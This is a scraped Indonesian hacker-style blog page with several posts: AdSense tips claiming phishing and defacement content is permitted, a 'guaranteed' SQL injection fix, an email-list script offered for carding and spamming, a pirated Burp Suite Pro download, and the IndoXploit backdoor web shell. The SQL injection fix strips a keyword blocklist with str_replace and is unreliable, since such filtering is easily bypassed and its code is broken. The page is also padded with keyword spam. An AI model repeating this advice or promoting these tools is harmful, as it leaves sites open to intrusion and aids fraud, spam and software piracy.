Nah Kalian sudah tau kan ? Langsung aja nih saya akan kasih tau tips nya


  1. Blog Tidak berisi hal-hal yang dilarang oleh google
    Google sudah tegas jika kalian mengandung unsur unsur yang berbau jahat pasti bakal dibanned / tidak memenuhi aturan. Yang "jahat" tapi diperbolehkan : mod;phising;deface;hacking.
    Contoh Terlarang : Crack, Film bajakan, Judi, Porno, dan musik copyright
  2. Membuat halaman pendukung
    seperti : About Us, Contact Us, Disclaimer, dan Privacy Policy. Halaman pendukung ini sangat penting karena google selalu ingin agar tidak ada halaman kosong / rusak di website / blog pengiklan.
  3. Template Responsive
    Template yang Responsive disenangi oleh google karena template yang responsive pasti membuat Visitor senang dengan pengalamannya berkunjung keblog tersebut. otomatis iklan juga akan tayang dengan benar dan pasti banyak klik.
  4. Konsisten Mengupdate Artikel
    Google juga manusia, siapa pun yang caper ke dia pasti akan dituruti permintaannya. Sama halnya dengan daftar adsense, jika ingin cepat diterima kalian harus sering sering update artikel sebelum request ke Adsense, baru setelah keterima terserah anda.
  5. Artikel Panjang, Jelas dan Detail
    Artikel yang bagus ia lah artikel yang memiliki lebih dari 300 karakter agar memerlukan waktu membacanya. Jika Visitor Membaca Terlebih dahulu maka jika diterima adsense maka visitor dapat melihat iklan dengan jelas dan mungkin saja tertarik lalu mengklik iklan tersebut.
Nah Tadi itu beberapa tips and trik Keterima Adsense, Tidak percaya ? Loh buktinya adsense saya ini keterima cuma 2 hari coy bayangin ! gimanna gk gampang tuh. Oke deh cukup sampai disini ya, sayanya juga sudah lelah ngetik ini sampai jumpa dipostingan berikutnya ya byebye :*
Read more

Thursday, January 10, 2019

Fix / Patch Bug SQL injection [ Protect Website From Hacker ]

Fix / Patch Bug SQL injection [ Protect Website From Hacker ]



Halo sobat rafli haxor, pada kesempataan kali ini saya mau share cara fix Bug SQL Injection di Website mu. Tips and trick ini sudah 100% teruji oleh saya dan saya jamin tahan sql injection. tapi sebelum itu kalian harus tahu dulu apa itu sql injection.

SQL Injection

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

Source : OWASP

Nah sekarang kalian sudah tahukan apa itu sql injection, sudah pasti ini sangat berbahaya karena masuk top 10 Vulnerability di OAWSP hingga sekarang.

How To Patch

Kalian pasti ingin memperbaikinya kan ? ya pasti lah makanya kalian berkunjung ke blog ini kan ? wkawak.

1. Buka File yang melakukan Get / Post terhadap database,,, misal.
$id = $_GET['id'];
kalo url bakal seperti ini : .php?id=[id]
2. Kita Lakukan Filter di kode tersebut dengan menggunakan fungsi str_replace seperti ini.
$iso = $_GET['id'];$filter = array('concat', 'make_set', 'export_set', '!', 'null', 'and', 'false', 'true', 'sleep', 'or', 'select', 'extractvalue', 'from', 'dual', '-', '+'. '', '%23', '%27', 'by', 'select', 'union', 'order', '(', ')');$replace = "";$id = str_replace($filter, $replace, $iso);
*Jika Terdapat error pada $replace anda bisa menggunakan array seperti ini :$replace = array('', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '');
3. Save Filenya
4. Test di server anda seharusnya sudah terprotect dari sql injection (blind, extrackvalue, union based, error based)

Terimakasih telah berkunjung kewebsite saya, saya harap kalian senang dan jangan sungkan sungkan untuk berkunjung kewebsite saya lagi.
BTW : Maafkan bila 1klan nya numpuk ea.

Tags : Perbaiki sql injection, fix sql injection, bypass sql injection, sql injection, cara fix sql injection, fix bug sql injection, patch sql injection, patching sql injection
Read more

Friday, December 21, 2018

Download Script Email Filter Terbaru 2018-2019 [ PHP CLI ]

Download Script Email Filter Terbaru 2018-2019



Halo Sobat Setia Rafli Hax0r apa kabar nih ? semoga aja baik yah.. Tanpa basa basi saya mau share Email Filter [ PHP CLI ] secara gratis dan bisa kalian recode. Script ini cocok banget buat kalian yang mau Kirim email secara Otomatis bersamaan untuk kebutuhan Promosi Hosting ( Misalnya ), C4rd1ng, Sp4ming, dan banyak hala. maka dari itu saya buat dan saya share disini..

Fitur :
Untuk Fitur saya baru sempat membuat 5 jenis email dikarenakan saya tidak tau email apa saja yang di butuhkan untuk filtering, yakni sebagai berikut :
  • Google.com
  • Aol.com
  • yahoo.com
  • orange.fr
  • hotmail.com
Jika email yg ingin anda filter tidak ada di list kalian bisa edit Scriptnya dan ganti dengan emal yang kalian mau. sekali lagi saya mohon maaf bila script ini sangat simple dan masih kurang worth it. jika suka silahkan dowbnload jika tidak ya... download aja siapa tau berubah pikiran :D

Link Download :

Oke Sekian dari saya Rafli pasya jika kalian ingin request script silahkan hubungi saya, selagi saya bisa buat + bermanfaat akan saya buatkan. Wabilahitaufik Walhidayah wassalamualaikum warahmatullahi wabarakahtu

email filter priv8 email filter online email filter script email filter checker email filter domain email filter php email filter carding email filtering email filter tools email filter anonym0us email filter android email filter address email filter app email filter aol email filter appliance review email filter application email filter apple mail email filter appliance open source an email filter is email with filters create an email filter in outlook what is a email filtering create a filter email gmail web and email filtering sieve an email filtering language email filter by date email filter bayesian email filter by email filter byu email filter bigpond email filter bayes email filter bulk email filter by size email filter backup email filtering based on supervised learning and mutual information feature selection email filter cli email filter comcast email filter check email filter cloud email filter c# email filter client email filter cloveretl email filter definition email filter discard message email filter date range email filter disabled filter email di gmail filter email di outlook email domain filter online filter email disabled in outlook 2010 email filter extractor email filter en fortigate email filter exchange filter email excel outlook email filter enable filter email addresses excel efa email filter evolution email filter email filter for gmail email filter for iphone email filter from text email filter for outlook email filter free email filter for spam email filter for yahoo email filter for office 365 email filter for android f-secure email filtering email filter gmx email filter gartner email filter gateway email filtering gmail filter email greyed out filter email greyed out outlook 2010 filter email greyed out outlook 2013 forwarding email filter gmail set email filter gmail gmail filter gmail filter date gmail filters gmail filter or gmail filter unread gmail filter unread emails gmail filter from more than one address gmail filter by year gmail filter or condition email filter hotmail email filter header email filter help cpanel email filter in header email filtering hardware filter email help email heuristic filtering junk email filter hotmail email spam filter hardware gmail email filter has the words email filter iphone email filter in gmail email filter in outlook email filter in php email filter in cpanel email filter in javascript email filter in fortigate email filter in outlook 2013 email filter in office 365 email filter in outlook 2010 email filter javascript email filter jquery email filter js email filter jira email filter justhost email junk filter email junk filter outlook email junk filter iphone filter email javamail email filter kpn email spam filter kaspersky kaspersky email filter outlook junk email filter keywords k9 mail filter e mail spamfilter kpn kpn e mail filter werkt niet kindle email filter email filter lotus notes email filter linux email filter live mail email filtering log filter email list online filter email lotus laravel email filter email filter mac mail email filter mac email filter meaning email filter match case email filter mailing list email filter messages by sender cpanel email filter matches regex email filter yahoo mail m-filter email m-filter email auditor email filter not working email filter not working in outlook email filter not email filter new folder cpanel email filter not working yahoo email filter not working filter email not working in outlook 2016 email notification filter email filter office 365 email filter on iphone email filter outlook 2016 email filter outlook 2013 email filter outlook 2010 email filter on android email filter outlook 2007 email filter on thunderbird types of email filtering benefits of email filtering examples of email filters importance of email filtering definition of email filtering email filter python email filter program email filter pro email filter plugin servicenow email filter plugin email filter palo alto email filter project email filter quickbooks email filter regex email filter rules outlook email filter rules email filter reviews email filter roadrunner email filter results jira email_filter rabbitmq email filter remove fortigate email filter regular expression email filter spam email filter server email filter software free email filter software email filter service email filter servicenow email filter system email filter thunderbird email filter to spam email filter test email filter to cut out spam email filter tips email filter t-online email filtering tools filter email to folder gmail t-online email filter at&t email filters t-online email spam filter t-online email spam filter einstellen att email spam filter t-online email center filter email filter uipath email filter unread email filtering ubuntu email spam filtering using supervised machine learning techniques filter unread email in gmail filter unwanted email gmail filter unread email in outlook 2010 email url filtering ipad email filter unread iphone email filter unread filter_var email email filter validate email filter virtual appliance filter_validate_email not working filter_validate_email regex filter_validate_email php version filter_validate_email php 7 filter_validate_email doesn't work filter_validate_email in codeigniter email filter wireshark email filter wildcard email filter webmail email filter web.de email filter whitelist email filter windows live email filter website email filter works email filter xfinity email x-filter-id xeam email filter iphone x email spam filter email filter yahoo email spam filter yahoo cara filter email yahoo filter email by year filter email by year outlook yahoo email filter forward junk email filter yahoo yahoo email filter multiple senders email filter zimbra cara filter email zimbra zoho email filter zoneminder email filter zendesk email filter zammad email filter zimbra email filter not working zix email filter instellen email filter ziggo email filter fortigate 100d email spam filter 123 reg 1und1 email filter 1and1 email filter email spam filter windows 10 email spam filter ios 11 1&1 email filter 1&1 email spam filter outlook junk email filter 2010 filter email outlook 2010 disabled filter email di outlook 2010 ipad 2 email spam filter email spam filter office 365 email filtering office 365 junk email filter office 365 barracuda email filter office 365 365 email filter junk email filter outlook 365 create email filter outlook 365 sophos email filter office 365 3 junk email filter lists ispconfig 3 email content filter how email filter fortigate 5.4 fortigate email filter 5.2 iphone 5 email spam filter iphone 5 junk email filter note 5 email spam filter email filter iphone 6 email filter for iphone 6s iphone 6 email filters iphone 6 email spam filter iphone 6 email junk filter iphone 7 email filter iphone 7 email spam filter iphone 8 email filter ios 8 email spam filter ibm notes 9 email filter lotus notes 9 filter email sophos utm 9 email filtering
Read more

Tuesday, December 4, 2018

Burp Suite Pro Full Version 1.7.34 Free Download 2018

Burp Suite Pro Full Version 1.7.34 Free Download 2018
Hasil gambar untuk Burp Suite

Hello visitors, come back with me on this website. in this post I will update the latest Burp Suite tool to you. For those of you who don't know what the burp suite is, you can read the explanation below. What Is Burp Suite?
Burp or Burp Suite is a graphical tool for testing Web application security. The tool is written in Java and developed by PortSwigger Web Security.
The tool has three editions. A Community Edition that can be downloaded free of charge, a Professional Edition and an Enterprise edition that can be purchased after a trial period. The Community edition has significantly reduced functionality. It was developed to provide a comprehensive solution for web application security checks. In addition to basic functionality, such as proxy server, scanner and intruder, the tool also contains more advanced options such as a spider, a repeater, a decoder, a comparer, an extender and a sequencer.

In the tool there are many features as follows.

  • HTTP Proxy - It operates as a web proxy server, and sits as a man-in-the-middle between the browser and destination web servers. This allows the interception, inspection and modification of the raw traffic passing in both directions.
  • Scanner - A web application security scanner, used for performing automated vulnerability scans of web applications.
  • Intruder - This tool can perform automated attacks on web applications. The tool offers a configurable algorithm that can generate malicious HTTP requests. The intruder tool can test and detect SQL InjectionsCross Site Scripting, parameter manipulation and vulnerabilities susceptible to brute-force attacks.
  • Spider - A tool for automatically crawling web applications. It can be used in conjunction with manual mapping techniques to speed up the process of mapping an application's content and functionality.
  • Repeater - A simple tool that can be used to manually test an application. It can be used to modify requests to the server, resend them, and observe the results.
  • Decoder - A tool for transforming encoded data into its canonical form, or for transforming raw data into various encoded and hashed forms. It is capable of intelligently recognizing several encoding formats using heuristic techniques.
  • Comparer - A tool for performing a comparison (a visual "diff") between any two items of data.
  • Extender - Allows the security tester to load Burp extensions, to extend Burp's functionality using the security testers own or third-party code (BappStore).
  • Sequencer - A tool for analyzing the quality of randomness in a sample of data items. It can be used to test an application's session tokens or other important data items that are intended to be unpredictable, such as anti-CSRF tokens, password reset tokens, etc.

That's some information about Burp Suite, you can directly download the tool at the following link.






Here is a Burst Suite Full Version Free 2018 installation video tutorial.



Read more

Saturday, December 1, 2018

Download Shell IndoXploit v.3 terbaru 2018

Download Shell IndoXploit v.3 terbaru 2018

Halo Sobat, Kembali lagi di blog / website Rafli Hax0r walaupun saya bukan haaxor.. Pada Artikel kali ini saya akan share shell indoxploit terbaru 2018 dengan berbagai fitur menarik :) cekidot aja yuk kita liat screenshotnya

Apa itu Shell backdoor ?

backdoor shell is a malicious piece of code (e.g. PHPPythonRuby) that can be uploaded to a site to gain access to files stored on that site. Once it is uploaded, the hacker can use it to edit, delete, or download any files on the site, or upload their own.

Screenshot :




Fiturnya Lengkap seperti :
Bagaimana ? Menarik bukan ? silahkan download di link dibawah ini :
[GOOGLE DRIVE]

Terimakasih Telah berkunjung ke website saya, i hope you like it and share this artikel to your hacker's friends. Jalan jalan Beli kerupuk, Akhir kata Assalamualaikum wr.wb

Read more